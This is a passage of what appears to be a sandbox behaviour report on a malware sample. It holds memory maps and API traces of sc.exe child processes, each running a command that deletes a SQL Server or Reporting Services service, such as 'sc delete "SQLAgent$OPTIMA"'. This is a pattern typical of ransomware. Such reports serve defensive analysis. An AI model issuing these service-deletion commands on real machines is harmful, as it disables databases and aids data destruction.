5259 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5260 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5261 start_va = 0xc887110000 end_va = 0xc887116fff entry_point = 0x0 region_type = private name = "private_0x000000c887110000" filename = "" Region: id = 5262 start_va = 0xc887260000 end_va = 0xc88733efff entry_point = 0xc887260000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5263 start_va = 0xc887220000 end_va = 0xc887231fff entry_point = 0xc887220000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 79 os_tid = 0xd70 [0077.743] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0077.743] __set_app_type (_Type=0x1) [0077.743] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0077.743] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0077.743] SetThreadUILanguage (LangId=0x0) returned 0x409 [0077.747] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0077.747] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0077.747] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0077.748] _wcsicmp (_String1="delete", _String2="query") returned -13 [0077.748] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0077.748] _wcsicmp (_String1="delete", _String2="start") returned -15 [0077.748] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0077.748] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0077.748] _wcsicmp (_String1="delete", _String2="control") returned 1 [0077.748] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0077.748] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0077.748] _wcsicmp (_String1="delete", _String2="config") returned 1 [0077.748] _wcsicmp (_String1="delete", _String2="description") returned -7 [0077.748] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0077.748] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0077.748] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0077.748] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0077.748] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0077.748] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0077.748] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0077.748] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0077.748] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0077.748] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0077.748] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0077.748] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0077.748] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0077.748] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0077.748] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0077.748] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0077.748] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0077.748] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0077.748] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0077.748] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0077.748] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0077.748] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0077.750] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0xc8871288c0 [0077.754] OpenServiceW (hSCManager=0xc8871288c0, lpServiceName="MSSQL$OPTIMA", dwDesiredAccess=0x10000) returned 0x0 [0077.754] GetLastError () returned 0x424 [0077.754] _ultow (in: _Dest=0x424, _Radix=-2030437064 | out: _Dest=0x424) returned="1060" [0077.754] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0077.756] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0xc886f9fcf0, nSize=0x2, Arguments=0xc886f9fd20 | out: lpBuffer="頰蜒È") returned 0x62 [0077.756] GetFileType (hFile=0x24) returned 0x2 [0077.756] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0xc886f9fca0 | out: lpMode=0xc886f9fca0) returned 1 [0077.757] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0xc887129830*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0xc886f9fc98, lpReserved=0x0 | out: lpBuffer=0xc887129830*, lpNumberOfCharsWritten=0xc886f9fc98*=0x62) returned 1 [0077.757] LocalFree (hMem=0xc887129830) returned 0x0 [0077.757] LocalFree (hMem=0x0) returned 0x0 [0077.757] CloseServiceHandle (hSCObject=0xc8871288c0) returned 1 [0077.757] LocalFree (hMem=0x0) returned 0x0 [0077.757] exit (_Code=1060) Thread: id = 333 os_tid = 0x12e0 Process: id = "52" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0xef00000" os_pid = "0xd74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"SQLAgent$OPTIMA\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1179 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1180 start_va = 0x6047f50000 end_va = 0x6047f6ffff entry_point = 0x0 region_type = private name = "private_0x0000006047f50000" filename = "" Region: id = 1181 start_va = 0x6047f70000 end_va = 0x6047f83fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006047f70000" filename = "" Region: id = 1182 start_va = 0x6047f90000 end_va = 0x604800ffff entry_point = 0x0 region_type = private name = "private_0x0000006047f90000" filename = "" Region: id = 1183 start_va = 0x6048010000 end_va = 0x6048013fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006048010000" filename = "" Region: id = 1184 start_va = 0x6048020000 end_va = 0x6048020fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006048020000" filename = "" Region: id = 1185 start_va = 0x6048030000 end_va = 0x6048031fff entry_point = 0x0 region_type = private name = "private_0x0000006048030000" filename = "" Region: id = 1186 start_va = 0x7df5ff340000 end_va = 0x7ff5ff33ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff340000" filename = "" Region: id = 1187 start_va = 0x7ff67a000000 end_va = 0x7ff67a022fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a000000" filename = "" Region: id = 1188 start_va = 0x7ff67a024000 end_va = 0x7ff67a024fff entry_point = 0x0 region_type = private name = "private_0x00007ff67a024000" filename = "" Region: id = 1189 start_va = 0x7ff67a02e000 end_va = 0x7ff67a02ffff entry_point = 0x0 region_type = private name = "private_0x00007ff67a02e000" filename = "" Region: id = 1190 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 1191 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1681 start_va = 0x6048120000 end_va = 0x604821ffff entry_point = 0x0 region_type = private name = "private_0x0000006048120000" filename = "" Region: id = 1682 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1683 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5078 start_va = 0x6047f50000 end_va = 0x6047f5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006047f50000" filename = "" Region: id = 5079 start_va = 0x6047f60000 end_va = 0x6047f66fff entry_point = 0x0 region_type = private name = "private_0x0000006047f60000" filename = "" Region: id = 5080 start_va = 0x6048040000 end_va = 0x60480fdfff entry_point = 0x6048040000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5081 start_va = 0x6048220000 end_va = 0x604829ffff entry_point = 0x0 region_type = private name = "private_0x0000006048220000" filename = "" Region: id = 5082 start_va = 0x6048320000 end_va = 0x604832ffff entry_point = 0x0 region_type = private name = "private_0x0000006048320000" filename = "" Region: id = 5083 start_va = 0x7ff679f00000 end_va = 0x7ff679ffffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff679f00000" filename = "" Region: id = 5084 start_va = 0x7ff67a02c000 end_va = 0x7ff67a02dfff entry_point = 0x0 region_type = private name = "private_0x00007ff67a02c000" filename = "" Region: id = 5085 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5086 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5093 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5094 start_va = 0x6048100000 end_va = 0x6048106fff entry_point = 0x0 region_type = private name = "private_0x0000006048100000" filename = "" Region: id = 5095 start_va = 0x6048330000 end_va = 0x604840efff entry_point = 0x6048330000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5096 start_va = 0x60482a0000 end_va = 0x60482b1fff entry_point = 0x60482a0000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 80 os_tid = 0xd78 [0075.814] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0075.814] __set_app_type (_Type=0x1) [0075.814] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0075.814] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0075.814] SetThreadUILanguage (LangId=0x0) returned 0x409 [0075.918] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0075.918] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0075.918] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0075.918] _wcsicmp (_String1="delete", _String2="query") returned -13 [0075.918] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0075.918] _wcsicmp (_String1="delete", _String2="start") returned -15 [0075.918] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0075.918] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0075.918] _wcsicmp (_String1="delete", _String2="control") returned 1 [0075.919] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0075.919] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0075.919] _wcsicmp (_String1="delete", _String2="config") returned 1 [0075.919] _wcsicmp (_String1="delete", _String2="description") returned -7 [0075.919] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0075.919] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0075.919] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0075.919] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0075.919] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0075.919] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0075.919] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0075.919] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0075.919] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0075.919] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0075.919] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0075.919] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0075.919] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0075.919] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0075.919] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0075.919] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0075.919] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0075.919] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0075.919] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0075.919] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0075.919] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0075.919] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0075.920] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x6048128910 [0075.925] OpenServiceW (hSCManager=0x6048128910, lpServiceName="SQLAgent$OPTIMA", dwDesiredAccess=0x10000) returned 0x0 [0075.925] GetLastError () returned 0x424 [0075.925] _ultow (in: _Dest=0x424, _Radix=1208023448 | out: _Dest=0x424) returned="1060" [0075.925] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0075.927] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x604800f950, nSize=0x2, Arguments=0x604800f980 | out: lpBuffer="顐䠒`") returned 0x62 [0075.927] GetFileType (hFile=0x24) returned 0x2 [0075.927] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x604800f900 | out: lpMode=0x604800f900) returned 1 [0075.965] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x6048129850*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x604800f8f8, lpReserved=0x0 | out: lpBuffer=0x6048129850*, lpNumberOfCharsWritten=0x604800f8f8*=0x62) returned 1 [0075.965] LocalFree (hMem=0x6048129850) returned 0x0 [0075.965] LocalFree (hMem=0x0) returned 0x0 [0075.965] CloseServiceHandle (hSCObject=0x6048128910) returned 1 [0075.966] LocalFree (hMem=0x0) returned 0x0 [0075.966] exit (_Code=1060) Thread: id = 323 os_tid = 0x1250 Process: id = "53" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0xef87000" os_pid = "0xd7c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"ReportServer$OPTIMA\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1192 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1193 start_va = 0x31e9bb0000 end_va = 0x31e9bcffff entry_point = 0x0 region_type = private name = "private_0x00000031e9bb0000" filename = "" Region: id = 1194 start_va = 0x31e9bd0000 end_va = 0x31e9be3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000031e9bd0000" filename = "" Region: id = 1195 start_va = 0x31e9bf0000 end_va = 0x31e9c6ffff entry_point = 0x0 region_type = private name = "private_0x00000031e9bf0000" filename = "" Region: id = 1196 start_va = 0x31e9c70000 end_va = 0x31e9c73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000031e9c70000" filename = "" Region: id = 1197 start_va = 0x31e9c80000 end_va = 0x31e9c80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000031e9c80000" filename = "" Region: id = 1198 start_va = 0x31e9c90000 end_va = 0x31e9c91fff entry_point = 0x0 region_type = private name = "private_0x00000031e9c90000" filename = "" Region: id = 1199 start_va = 0x7df5ff290000 end_va = 0x7ff5ff28ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff290000" filename = "" Region: id = 1200 start_va = 0x7ff67aba0000 end_va = 0x7ff67abc2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67aba0000" filename = "" Region: id = 1201 start_va = 0x7ff67abcd000 end_va = 0x7ff67abcefff entry_point = 0x0 region_type = private name = "private_0x00007ff67abcd000" filename = "" Region: id = 1202 start_va = 0x7ff67abcf000 end_va = 0x7ff67abcffff entry_point = 0x0 region_type = private name = "private_0x00007ff67abcf000" filename = "" Region: id = 1203 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 1204 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1684 start_va = 0x31e9cc0000 end_va = 0x31e9dbffff entry_point = 0x0 region_type = private name = "private_0x00000031e9cc0000" filename = "" Region: id = 1685 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1686 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5264 start_va = 0x31e9bb0000 end_va = 0x31e9bbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000031e9bb0000" filename = "" Region: id = 5265 start_va = 0x31e9bc0000 end_va = 0x31e9bc6fff entry_point = 0x0 region_type = private name = "private_0x00000031e9bc0000" filename = "" Region: id = 5266 start_va = 0x31e9dc0000 end_va = 0x31e9e7dfff entry_point = 0x31e9dc0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5267 start_va = 0x31e9e80000 end_va = 0x31e9efffff entry_point = 0x0 region_type = private name = "private_0x00000031e9e80000" filename = "" Region: id = 5268 start_va = 0x31e9f40000 end_va = 0x31e9f4ffff entry_point = 0x0 region_type = private name = "private_0x00000031e9f40000" filename = "" Region: id = 5269 start_va = 0x7ff67aaa0000 end_va = 0x7ff67ab9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67aaa0000" filename = "" Region: id = 5270 start_va = 0x7ff67abcb000 end_va = 0x7ff67abccfff entry_point = 0x0 region_type = private name = "private_0x00007ff67abcb000" filename = "" Region: id = 5271 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5272 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5273 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5274 start_va = 0x31e9ca0000 end_va = 0x31e9ca6fff entry_point = 0x0 region_type = private name = "private_0x00000031e9ca0000" filename = "" Region: id = 5275 start_va = 0x31e9f50000 end_va = 0x31ea02efff entry_point = 0x31e9f50000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5276 start_va = 0x31e9f00000 end_va = 0x31e9f11fff entry_point = 0x31e9f00000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 81 os_tid = 0xd80 [0077.823] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0077.823] __set_app_type (_Type=0x1) [0077.823] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0077.823] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0077.824] SetThreadUILanguage (LangId=0x0) returned 0x409 [0077.866] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0077.866] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0077.866] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0077.866] _wcsicmp (_String1="delete", _String2="query") returned -13 [0077.866] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0077.866] _wcsicmp (_String1="delete", _String2="start") returned -15 [0077.866] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0077.866] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0077.866] _wcsicmp (_String1="delete", _String2="control") returned 1 [0077.866] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0077.866] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0077.866] _wcsicmp (_String1="delete", _String2="config") returned 1 [0077.866] _wcsicmp (_String1="delete", _String2="description") returned -7 [0077.866] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0077.866] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0077.866] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0077.866] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0077.866] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0077.866] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0077.866] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0077.866] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0077.866] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0077.866] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0077.866] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0077.866] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0077.866] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0077.866] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0077.866] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0077.867] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0077.867] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0077.867] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0077.867] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0077.867] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0077.867] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0077.867] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0077.868] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x31e9cc8a60 [0077.872] OpenServiceW (hSCManager=0x31e9cc8a60, lpServiceName="ReportServer$OPTIMA", dwDesiredAccess=0x10000) returned 0x0 [0077.873] GetLastError () returned 0x424 [0077.873] _ultow (in: _Dest=0x424, _Radix=-372835000 | out: _Dest=0x424) returned="1060" [0077.873] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0077.874] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x31e9c6fd00, nSize=0x2, Arguments=0x31e9c6fd30 | out: lpBuffer="顐1") returned 0x62 [0077.874] GetFileType (hFile=0x24) returned 0x2 [0077.874] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x31e9c6fcb0 | out: lpMode=0x31e9c6fcb0) returned 1 [0077.892] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x31e9cc9850*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x31e9c6fca8, lpReserved=0x0 | out: lpBuffer=0x31e9cc9850*, lpNumberOfCharsWritten=0x31e9c6fca8*=0x62) returned 1 [0077.893] LocalFree (hMem=0x31e9cc9850) returned 0x0 [0077.893] LocalFree (hMem=0x0) returned 0x0 [0077.893] CloseServiceHandle (hSCObject=0x31e9cc8a60) returned 1 [0077.893] LocalFree (hMem=0x0) returned 0x0 [0077.893] exit (_Code=1060) Thread: id = 334 os_tid = 0x12e4 Process: id = "54" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0x5d5cc000" os_pid = "0xd84" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"msftesql$SQLEXPRESS\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1205 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1206 start_va = 0x1863530000 end_va = 0x186354ffff entry_point = 0x0 region_type = private name = "private_0x0000001863530000" filename = "" Region: id = 1207 start_va = 0x1863550000 